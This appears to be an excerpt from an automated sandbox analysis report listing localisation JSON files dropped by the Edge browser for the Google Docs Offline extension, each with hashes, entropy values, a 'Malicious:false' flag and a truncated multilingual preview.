                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):3122
                                                                                                                                                                                                      Entropy (8bit):3.891443295908904
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                      MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                      SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                      SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                      SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1895
                                                                                                                                                                                                      Entropy (8bit):4.28990403715536
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                      MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                      SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                      SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                      SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1042
                                                                                                                                                                                                      Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                      MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                      SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                      SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                      SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2535
                                                                                                                                                                                                      Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                      MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                      SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                      SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                      SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1028
                                                                                                                                                                                                      Entropy (8bit):4.797571191712988
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                      MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                      SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                      SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                      SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):994
                                                                                                                                                                                                      Entropy (8bit):4.700308832360794
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                      MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                      SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                      SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                      SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2091
                                                                                                                                                                                                      Entropy (8bit):4.358252286391144
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                      MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                      SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                      SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                      SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2778
                                                                                                                                                                                                      Entropy (8bit):3.595196082412897
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                      MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                      SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                      SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                      SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1719
                                                                                                                                                                                                      Entropy (8bit):4.287702203591075
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                      MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                      SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                      SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                      SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):936
                                                                                                                                                                                                      Entropy (8bit):4.457879437756106
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                      MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                      SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                      SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                      SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):3830
                                                                                                                                                                                                      Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                      MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                      SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                      SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                      SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1898
                                                                                                                                                                                                      Entropy (8bit):4.187050294267571
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                      MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                      SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                      SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                      SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):914
                                                                                                                                                                                                      Entropy (8bit):4.513485418448461
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                      MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                      SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                      SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                      SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):878
                                                                                                                                                                                                      Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                      MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                      SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                      SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                      SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2766
                                                                                                                                                                                                      Entropy (8bit):3.839730779948262
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                      MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                      SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                      SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                      SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                      Malicious:false
